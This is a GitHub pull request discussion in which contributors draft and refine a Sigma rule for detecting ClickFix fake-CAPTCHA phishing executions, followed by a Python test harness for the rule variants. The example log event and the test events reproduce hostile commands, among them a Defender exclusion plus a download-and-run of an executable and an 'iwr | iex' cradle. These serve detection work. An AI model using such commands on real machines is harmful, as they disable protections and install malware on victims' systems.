
Adding rule for detecting recaptcha phish process executions #5218


Status: Open, wants to merge 3 commits into base: master

Conversation

montysecurity

Summary of the Pull Request

Adding rule for detecting recaptcha phish process executions

Changelog

New: proc_creation_win_powershell_fake_captcha.yml

Example Log Event

cmd /c "powershell Add-MpPreference -ExclusionPath 'C:\' && timeout 2 && powershell Invoke-WebRequest -Uri 'http://book[.]rollingvideogames[.]com/temp/1.exe' -OutFile '%TEMP%\1.exe' && start %TEMP%\1.exe" # ✅ ''I am not a robot - reCAPTCHA Verification ID: 1212''

Reference: https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware

Fixed Issues

N/A

SigmaHQ Rule Creation Conventions

  • If your PR adds new rules, please consider following and applying these conventions

@github-actions github-actions bot added Rules Windows Pull request add/update windows related rules labels Mar 1, 2025
@github-actions github-actions bot left a comment


Welcome @montysecurity 👋

It looks like this is your first pull request on the Sigma rules repository!

Please make sure to read the SigmaHQ conventions document to make sure your contribution is adhering to best practices and has all the necessary elements in place for a successful approval.

Thanks again, and welcome to the Sigma community! 😃

@swachchhanda000

swachchhanda000 commented Mar 4, 2025

Hi
I have observed other patterns among malware abusing this ClickFix technique and adjusted @montysecurity's rule accordingly. His rule was slightly incorrect as well, because for the log event given in his example the Image will be cmd.exe with ParentImage explorer.exe, not powershell.exe.

That's why I added them on CommandLine, not on Image, just to be safe.

proc_creation_win_susp_clickfix_execution_pattern.yml

title: Potential ClickFix Execution Pattern
id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635
status: experimental
description: |
    Detects potential ClickFix execution patterns leveraging social engineering techniques where users are tricked into running malicious commands via clipboard manipulation.
    This attack starts with users visiting malicious websites, often impersonating legitimate news or service platforms.
    These websites display fake CAPTCHA challenges labeled as "I am not a robot - reCAPTCHA Verification," instructing users to press Windows + R, paste clipboard contents into the Run dialog, and execute the command.
    The clipboard content typically contains mshta.exe or powershell.exe commands that download and execute malware, such as Lumma Stealer or other information stealers.
    This technique exploits user trust and bypasses traditional malware defenses by relying on user interaction.
references:
    - https://github.com./JohnHammond/recaptcha-phish
    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
    - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
    - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: montysecurity, Swachchhanda Shrawan Poudel(Nextron Systems)
date: 2025-03-04
tags:
    - attack.execution
    - attack.t1204.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\explorer.exe'
    selection_cmd_1:
        CommandLine|contains:
            - 'I am not a robot - reCAPTCHA Verification'
            - 'Verify you are human - Ray Verification ID:'
    selection_cmd_2:
        CommandLine|contains:
            - 'mshta'
            - 'powershell'
            # Add more potentially suspicious executables used for malware download/execution
    condition: all of selection_*
falsepositives:
    - Highly unlikely
level: high

cc @nasbench , @frack113

@montysecurity

Good eye and thanks for the assist @swachchhanda000 !

@nasbench

nasbench commented Mar 5, 2025

You do not need the CLI for the binaries as the captcha strings are enough.

@nasbench nasbench added the 2nd Review Needed PR need a second approval label Mar 5, 2025
@nasbench nasbench requested a review from frack113 March 5, 2025 00:21
@swachchhanda000

swachchhanda000 commented Mar 6, 2025

@montysecurity

@swachchhanda000 what about something like this? going for the more generic approach

title: Potential ClickFix Execution Pattern
id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635
status: experimental
description: |
    Detects potential ClickFix execution patterns leveraging social engineering techniques where users are tricked into running malicious commands via clipboard manipulation.
    This attack starts with users visiting malicious websites, often impersonating legitimate news or service platforms.
    These websites display fake CAPTCHA challenges labeled as "I am not a robot - reCAPTCHA Verification," instructing users to press Windows + R, paste clipboard contents into the Run dialog, and execute the command.
    The clipboard content typically contains mshta.exe or powershell.exe commands that download and execute malware, such as Lumma Stealer or other information stealers.
    This technique exploits user trust and bypasses traditional malware defenses by relying on user interaction.
references:
    - https://github.com./JohnHammond/recaptcha-phish
    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
    - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
    - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: montysecurity, Swachchhanda Shrawan Poudel(Nextron Systems)
date: 2025-03-04
tags:
    - attack.execution
    - attack.t1204.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\explorer.exe'
    selection_cmd_1:
        CommandLine|contains:
            - 'robot'
            - 'captcha'
            - 'recaptcha'
            - 'human'
            - 'verify'
            - 'verification'
    selection_cmd_2:
        CommandLine|contains:
            - '#' # PowerShell Comment
    selection_cmd_3:
        CommandLine|contains:
            - 'mshta'
            - 'powershell'
            - 'certutil'
            - 'scrobj.dll'
            # Add more potentially suspicious executables used for malware download/execution
    selection_cmd_4:
        CommandLine|contains:
            - 'https://'
            - 'http://'
    condition: all of selection_*
falsepositives:
    - Highly unlikely
level: high

@nasbench nasbench added this to the Sigma-March-Release milestone Mar 21, 2025
@swachchhanda000

swachchhanda000 commented Mar 22, 2025

Hi, after some brief research, I discovered that there are other forms of fake CAPTCHA messages being used in these lures. The '#' symbol remains a consistent element across all of them. Therefore, I made some adjustments by removing the suspicious executables to ensure the rule is not overly specific.

title: Potential ClickFix Execution Pattern
id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635
status: experimental
description: |
    Detects potential ClickFix execution patterns leveraging social engineering techniques where users are tricked into running malicious commands via clipboard manipulation.
    This attack starts with users visiting malicious websites, often impersonating legitimate news or service platforms.
    These websites display fake CAPTCHA challenges labeled as "I am not a robot - reCAPTCHA Verification," instructing users to press Windows + R, paste clipboard contents into the Run dialog, and execute the command.
    The clipboard content typically contains mshta.exe or powershell.exe commands that download and execute malware, such as Lumma Stealer or other information stealers.
    This technique exploits user trust and bypasses traditional malware defenses by relying on user interaction.
references:
    - https://github.com./JohnHammond/recaptcha-phish
    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
    - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
    - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: montysecurity, Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-03-22
tags:
    - attack.execution
    - attack.t1204.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\explorer.exe'
        CommandLine|contains: '#'
    selection_cmd:
        CommandLine|contains:
            # Add more suspicious keyword
            - 'account'
            - 'anti-bot'
            - 'botcheck'
            - 'captcha'
            - 'challenge'
            - 'confirmation'
            - 'fraud'
            - 'human'
            - 'identity'
            - 'robot'
            - 'validation'
            - 'verification'
            - 'verify'
    condition: all of selection_*
falsepositives:
    - Highly unlikely
level: high

cc @montysecurity, @nasbench , @frack113

Or we can be a little bit more generic by looking at Explorer.exe as ParentImage and a CommandLine containing 'http', as a medium-level rule. Let me know what you think.

title: Suspicious User-Initiated URL Execution via Explorer
id: df66b1ea-4ffe-4089-92b4-44d163b40d27
status: experimental
description: |
    Detects instances where Explorer.exe spawns processes with command lines containing URLs.
    This could indicate a user being socially engineered to execute commands via clipboard manipulation, such as in ClickFix or similar malware delivery campaigns.
    It may also catch generic misuse where users are manually launching download cradles or scripts that reference external resources.
references:
    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-03-22
tags:
    - attack.execution
    - attack.t1204.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\explorer.exe'
        CommandLine|contains: 'http'
    condition: selection
falsepositives:
    - IT administrators or power users launching trusted tools/scripts with URLs manually from explorer
    - In-house tools that might pass URLs as arguments via explorer-launched processes
level: medium

@montysecurity

Thanks @swachchhanda000 ! Given the target of the hunt being recaptcha, I like the first one you list there (Potential ClickFix Execution Pattern) better.

The second one is a good hunt as well, and yet I think it expands the scope a bit too far outside of recaptcha/clickfix. It definitely has some value though, so maybe as a separate rule?

@frack113

I prefer to stay with the pattern:

    selection_parent:
        ParentImage|endswith: '\explorer.exe'
        CommandLine|contains: '#'
    selection_cmd:
        CommandLine|contains:
        # Add more suspicious keyword

CommandLine|contains: 'http' may have too many false positives.
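To make the trade-offs in this thread concrete (the exact-phrase first revision, the '#' plus lure-keyword revision, and the broader 'http' rule, plus the Image/ParentImage point about the Run dialog's first hop), here is an added example that runs all three rule shapes over a handful of constructed process_creation events. This is not code from the SigmaHQ repository or from the PR; the matcher is a minimal stand-in for a real Sigma backend that implements only the `|contains` and `|endswith` modifiers (case-insensitively, as Sigma specifies), and the event names, paths and `example.invalid` URLs are invented. The first command line mirrors the PR's example log event.

```python
"""
Run the three rule shapes discussed in this PR over constructed process_creation events.
Added example for this thread, not code from the SigmaHQ repository or the PR.
The matcher is a minimal stand-in for a Sigma backend: it implements only the
|contains and |endswith modifiers, case-insensitively, as Sigma specifies.
"""
from typing import Dict, Iterable, List, Union

Needles = Union[str, Iterable[str]]


def _as_list(needles: Needles) -> List[str]:
    return [needles] if isinstance(needles, str) else list(needles)


def contains(value: str, needles: Needles) -> bool:
    """Sigma `field|contains`: any needle is a case-insensitive substring of the field."""
    v = value.lower()
    return any(n.lower() in v for n in _as_list(needles))


def endswith(value: str, needles: Needles) -> bool:
    """Sigma `field|endswith`, case-insensitive."""
    v = value.lower()
    return any(v.endswith(n.lower()) for n in _as_list(needles))


# Keyword list from the 2025-03-22 revision of the rule in this thread.
LURE_KEYWORDS = [
    "account", "anti-bot", "botcheck", "captcha", "challenge", "confirmation",
    "fraud", "human", "identity", "robot", "validation", "verification", "verify",
]


def rule_v1_exact_phrases(ev: Dict[str, str]) -> bool:
    """First revision: explorer.exe parent + a known lure phrase + mshta/powershell in the command line."""
    return (
        endswith(ev["ParentImage"], "\\explorer.exe")
        and contains(ev["CommandLine"], [
            "I am not a robot - reCAPTCHA Verification",
            "Verify you are human - Ray Verification ID:",
        ])
        and contains(ev["CommandLine"], ["mshta", "powershell"])
    )


def rule_v3_comment_and_keyword(ev: Dict[str, str]) -> bool:
    """2025-03-22 revision: explorer.exe parent + '#' in the command line + any lure keyword."""
    selection_parent = endswith(ev["ParentImage"], "\\explorer.exe") and contains(ev["CommandLine"], "#")
    selection_cmd = contains(ev["CommandLine"], LURE_KEYWORDS)
    return selection_parent and selection_cmd


def rule_url_via_explorer(ev: Dict[str, str]) -> bool:
    """The broader medium-level proposal: explorer.exe parent + 'http' anywhere in the command line."""
    return endswith(ev["ParentImage"], "\\explorer.exe") and contains(ev["CommandLine"], "http")


RULES = {
    "v1_exact_phrases": rule_v1_exact_phrases,
    "v3_comment_and_keyword": rule_v3_comment_and_keyword,
    "url_via_explorer": rule_url_via_explorer,
}

# Constructed events (hypothetical hosts/paths). Only the first command line is taken from the PR.
EVENTS: List[Dict[str, str]] = [
    {   # Mirrors the PR's example: the Run dialog's first hop is cmd.exe, spawned by explorer.exe
        "name": "clickfix_powershell_via_cmd",
        "Image": "C:\\Windows\\System32\\cmd.exe",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": "cmd /c \"powershell Add-MpPreference -ExclusionPath 'C:\\' && timeout 2 && "
                       "powershell Invoke-WebRequest -Uri 'http://book[.]rollingvideogames[.]com/temp/1.exe' "
                       "-OutFile '%TEMP%\\1.exe' && start %TEMP%\\1.exe\" "
                       "# ✅ ''I am not a robot - reCAPTCHA Verification ID: 1212''",
    },
    {   # Constructed mshta variant carrying the second lure phrase from the first revision
        "name": "clickfix_mshta_ray_id",
        "Image": "C:\\Windows\\System32\\mshta.exe",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": "mshta https://verify.example.invalid/page.hta "
                       "# ✅ ''Verify you are human - Ray Verification ID: 4821''",
    },
    {   # Constructed lure wording that neither exact phrase covers, but still '#' plus a keyword
        "name": "clickfix_new_lure_wording",
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": "powershell -w hidden -c \"iwr https://cdn.example.invalid/x.ps1 | iex\" "
                       "# ✅ Anti-bot check passed - Verification complete",
    },
    {   # Benign: a user opening an intranet URL from the Run dialog
        "name": "benign_browser_with_url",
        "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" https://intranet.example.invalid/docs",
    },
    {   # Benign: a script with a trailing comment but no lure keyword
        "name": "benign_script_with_comment",
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1 # nightly job",
    },
    {   # Second hop of the first event: parent is cmd.exe, so no explorer.exe-anchored rule can fire
        "name": "clickfix_second_hop_from_cmd",
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "ParentImage": "C:\\Windows\\System32\\cmd.exe",
        "CommandLine": "powershell Invoke-WebRequest -Uri 'http://book[.]rollingvideogames[.]com/temp/1.exe' "
                       "-OutFile 'C:\\Users\\user\\AppData\\Local\\Temp\\1.exe'",
    },
]


def evaluate(events: List[Dict[str, str]] = EVENTS) -> Dict[str, Dict[str, bool]]:
    """Map event name -> {rule name -> matched}."""
    return {ev["name"]: {name: rule(ev) for name, rule in RULES.items()} for ev in events}


def hits(rule_name: str, events: List[Dict[str, str]] = EVENTS) -> List[str]:
    """Names of the events a given rule fires on, in input order."""
    return [ev["name"] for ev in events if RULES[rule_name](ev)]


if __name__ == "__main__":
    for name, result in evaluate().items():
        print(f"{name:30s} " + "  ".join(f"{r}={'HIT' if m else '-'}" for r, m in result.items()))
```

Running it shows why the thread settled where it did: the exact-phrase revision misses the third lure, the 'http' rule fires on the benign browser launch, and only the '#' plus keyword revision catches all three lures without either benign event. The last event also shows that every explorer.exe-anchored variant sees only the first hop out of the Run dialog, so the command line of that first process is where the lure text has to be matched.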
